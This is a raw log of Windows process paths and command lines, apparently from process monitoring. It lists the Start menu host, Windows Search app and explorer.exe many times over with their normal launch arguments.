C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
